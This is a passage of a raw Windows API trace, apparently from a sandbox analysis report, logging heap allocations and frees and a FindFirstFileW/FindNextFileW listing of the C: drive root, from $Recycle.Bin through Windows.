dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.067] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x68d798 [0056.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0056.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328ece8 [0056.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0056.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0056.068] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x38) returned 0x327ca80 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.068] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0056.068] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0056.068] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x54) returned 0x3296380 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e888 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x327ca80 | out: hHeap=0x660000) returned 1 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.068] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165a8 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269568 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e888 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165a8 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.069] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0056.069] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e888 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x3201650 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269568 | out: hHeap=0x660000) returned 1 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e888 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.069] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0056.069] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e888 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e888 | out: hHeap=0x660000) returned 1 [0056.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.069] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a9ab0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb0a9ab0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0056.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfc) returned 0x3234418 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e888 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e630 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201650 | out: hHeap=0x660000) returned 1 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0056.070] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0056.070] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1aeb8bb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1aeb8bb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.070] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0056.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16c) returned 0x3247810 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e720 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee28 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328d870 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e888 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e630 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.071] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165a8 [0056.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165a8 | out: hHeap=0x660000) returned 1 [0056.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.071] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17fb5930, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.072] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.072] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x214) returned 0x326a370 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e888 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e4a0 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eb30 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e6a8 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165a8 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0056.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e720 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee28 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d870 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e630 | 